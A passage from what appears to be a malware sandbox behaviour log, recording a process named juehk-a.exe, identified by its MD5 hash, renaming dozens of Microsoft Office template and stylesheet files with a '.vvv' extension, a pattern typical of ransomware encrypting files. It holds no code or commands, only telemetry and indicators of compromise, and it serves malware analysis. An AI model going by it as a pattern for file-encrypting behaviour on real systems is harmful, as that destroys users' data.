- new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.PPT.vvv
- ads:
- fid (ads:): 562949953496050
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98592
- mode: rename
- sequenceNumber: 2266
- filesize: 9134
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.XLS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLN.XLS.vvv
- ads:
- fid (ads:): 562949953496314
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98645
- mode: rename
- sequenceNumber: 2267
- filesize: 20398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.DOC
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.DOC.vvv
- ads:
- fid (ads:): 562949953496315
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98666
- mode: rename
- sequenceNumber: 2268
- filesize: 12718
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.PPT
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.PPT.vvv
- ads:
- fid (ads:): 562949953496051
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98686
- mode: rename
- sequenceNumber: 2269
- filesize: 9134
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.XLS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PROTTPLV.XLS.vvv
- ads:
- fid (ads:): 562949953496316
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98740
- mode: rename
- sequenceNumber: 2270
- filesize: 127054
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME01.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME01.CSS.vvv
- ads:
- fid (ads:): 562949953496466
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98765
- mode: rename
- sequenceNumber: 2271
- filesize: 130398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME02.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME02.CSS.vvv
- ads:
- fid (ads:): 562949953496467
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98797
- mode: rename
- sequenceNumber: 2272
- filesize: 127438
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME03.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME03.CSS.vvv
- ads:
- fid (ads:): 562949953496468
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98820
- mode: rename
- sequenceNumber: 2273
- filesize: 128654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME04.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME04.CSS.vvv
- ads:
- fid (ads:): 562949953496469
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98833
- mode: rename
- sequenceNumber: 2274
- filesize: 126814
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME05.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME05.CSS.vvv
- ads:
- fid (ads:): 562949953496470
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98859
- mode: rename
- sequenceNumber: 2275
- filesize: 128126
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME06.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME06.CSS.vvv
- ads:
- fid (ads:): 562949953496471
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98883
- mode: rename
- sequenceNumber: 2276
- filesize: 131326
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME07.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME07.CSS.vvv
- ads:
- fid (ads:): 562949953496472
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98916
- mode: rename
- sequenceNumber: 2277
- filesize: 129854
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME08.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME08.CSS.vvv
- ads:
- fid (ads:): 562949953496473
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98940
- mode: rename
- sequenceNumber: 2278
- filesize: 132590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME09.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME09.CSS.vvv
- ads:
- fid (ads:): 562949953496474
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 98977
- mode: rename
- sequenceNumber: 2279
- filesize: 133326
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME10.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME10.CSS.vvv
- ads:
- fid (ads:): 562949953496475
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99010
- mode: rename
- sequenceNumber: 2280
- filesize: 131550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME11.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME11.CSS.vvv
- ads:
- fid (ads:): 562949953496476
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99039
- mode: rename
- sequenceNumber: 2281
- filesize: 123454
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME12.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME12.CSS.vvv
- ads:
- fid (ads:): 562949953496477
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99069
- mode: rename
- sequenceNumber: 2282
- filesize: 126526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME13.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME13.CSS.vvv
- ads:
- fid (ads:): 562949953496478
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99083
- mode: rename
- sequenceNumber: 2283
- filesize: 128878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME14.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME14.CSS.vvv
- ads:
- fid (ads:): 562949953496479
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99127
- mode: rename
- sequenceNumber: 2284
- filesize: 123454
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME15.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME15.CSS.vvv
- ads:
- fid (ads:): 562949953496480
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99140
- mode: rename
- sequenceNumber: 2285
- filesize: 129486
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME16.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME16.CSS.vvv
- ads:
- fid (ads:): 562949953496481
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99175
- mode: rename
- sequenceNumber: 2286
- filesize: 126078
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME17.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME17.CSS.vvv
- ads:
- fid (ads:): 562949953496482
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99190
- mode: rename
- sequenceNumber: 2287
- filesize: 132574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME18.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME18.CSS.vvv
- ads:
- fid (ads:): 562949953496483
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99213
- mode: rename
- sequenceNumber: 2288
- filesize: 131486
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME19.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME19.CSS.vvv
- ads:
- fid (ads:): 562949953496484
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99227
- mode: rename
- sequenceNumber: 2289
- filesize: 129182
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME20.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME20.CSS.vvv
- ads:
- fid (ads:): 562949953496485
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99240
- mode: rename
- sequenceNumber: 2290
- filesize: 126094
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME21.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME21.CSS.vvv
- ads:
- fid (ads:): 562949953496486
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99271
- mode: rename
- sequenceNumber: 2291
- filesize: 130670
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME22.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME22.CSS.vvv
- ads:
- fid (ads:): 562949953496487
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99300
- mode: rename
- sequenceNumber: 2292
- filesize: 128926
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME23.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME23.CSS.vvv
- ads:
- fid (ads:): 562949953496488
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99334
- mode: rename
- sequenceNumber: 2293
- filesize: 126942
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME24.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME24.CSS.vvv
- ads:
- fid (ads:): 562949953496489
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99346
- mode: rename
- sequenceNumber: 2294
- filesize: 130702
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME25.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME25.CSS.vvv
- ads:
- fid (ads:): 562949953496490
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99361
- mode: rename
- sequenceNumber: 2295
- filesize: 119646
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME26.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME26.CSS.vvv
- ads:
- fid (ads:): 562949953496491
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99375
- mode: rename
- sequenceNumber: 2296
- filesize: 123438
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME27.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME27.CSS.vvv
- ads:
- fid (ads:): 562949953496492
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99391
- mode: rename
- sequenceNumber: 2297
- filesize: 121086
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME28.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME28.CSS.vvv
- ads:
- fid (ads:): 562949953496493
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99407
- mode: rename
- sequenceNumber: 2298
- filesize: 126190
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME29.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME29.CSS.vvv
- ads:
- fid (ads:): 562949953496494
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99439
- mode: rename
- sequenceNumber: 2299
- filesize: 120526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME30.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME30.CSS.vvv
- ads:
- fid (ads:): 562949953496495
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99456
- mode: rename
- sequenceNumber: 2300
- filesize: 120830
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME31.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME31.CSS.vvv
- ads:
- fid (ads:): 562949953496496
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99472
- mode: rename
- sequenceNumber: 2301
- filesize: 126158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME32.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME32.CSS.vvv
- ads:
- fid (ads:): 562949953496497
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99487
- mode: rename
- sequenceNumber: 2302
- filesize: 122462
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME33.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME33.CSS.vvv
- ads:
- fid (ads:): 562949953496498
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99588
- mode: rename
- sequenceNumber: 2303
- filesize: 119502
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME34.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME34.CSS.vvv
- ads:
- fid (ads:): 562949953496499
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99619
- mode: rename
- sequenceNumber: 2304
- filesize: 132254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME35.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME35.CSS.vvv
- ads:
- fid (ads:): 562949953496500
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99632
- mode: rename
- sequenceNumber: 2305
- filesize: 123598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME36.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME36.CSS.vvv
- ads:
- fid (ads:): 562949953496501
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99646
- mode: rename
- sequenceNumber: 2306
- filesize: 132958
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME37.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME37.CSS.vvv
- ads:
- fid (ads:): 562949953496502
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99660
- mode: rename
- sequenceNumber: 2307
- filesize: 127518
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME38.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME38.CSS.vvv
- ads:
- fid (ads:): 562949953496503
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99683
- mode: rename
- sequenceNumber: 2308
- filesize: 124398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME39.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME39.CSS.vvv
- ads:
- fid (ads:): 562949953496504
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99697
- mode: rename
- sequenceNumber: 2309
- filesize: 126190
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME40.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME40.CSS.vvv
- ads:
- fid (ads:): 562949953496505
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99718
- mode: rename
- sequenceNumber: 2310
- filesize: 125694
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME41.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME41.CSS.vvv
- ads:
- fid (ads:): 562949953496507
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99735
- mode: rename
- sequenceNumber: 2311
- filesize: 121550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME42.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME42.CSS.vvv
- ads:
- fid (ads:): 562949953496508
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99750
- mode: rename
- sequenceNumber: 2312
- filesize: 125118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME43.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME43.CSS.vvv
- ads:
- fid (ads:): 562949953496509
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99779
- mode: rename
- sequenceNumber: 2313
- filesize: 126622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME44.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME44.CSS.vvv
- ads:
- fid (ads:): 562949953496511
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99793
- mode: rename
- sequenceNumber: 2314
- filesize: 125006
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME45.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME45.CSS.vvv
- ads:
- fid (ads:): 562949953496512
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99808
- mode: rename
- sequenceNumber: 2315
- filesize: 130910
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME46.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME46.CSS.vvv
- ads:
- fid (ads:): 562949953496513
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99820
- mode: rename
- sequenceNumber: 2316
- filesize: 127806
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME47.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME47.CSS.vvv
- ads:
- fid (ads:): 562949953496515
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99854
- mode: rename
- sequenceNumber: 2317
- filesize: 129838
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME48.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME48.CSS.vvv
- ads:
- fid (ads:): 562949953496516
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99869
- mode: rename
- sequenceNumber: 2318
- filesize: 121870
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME49.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME49.CSS.vvv
- ads:
- fid (ads:): 562949953496517
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99899
- mode: rename
- sequenceNumber: 2319
- filesize: 127422
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME50.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME50.CSS.vvv
- ads:
- fid (ads:): 562949953496518
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99915
- mode: rename
- sequenceNumber: 2320
- filesize: 123150
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME51.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME51.CSS.vvv
- ads:
- fid (ads:): 562949953496520
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99932
- mode: rename
- sequenceNumber: 2321
- filesize: 123902
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
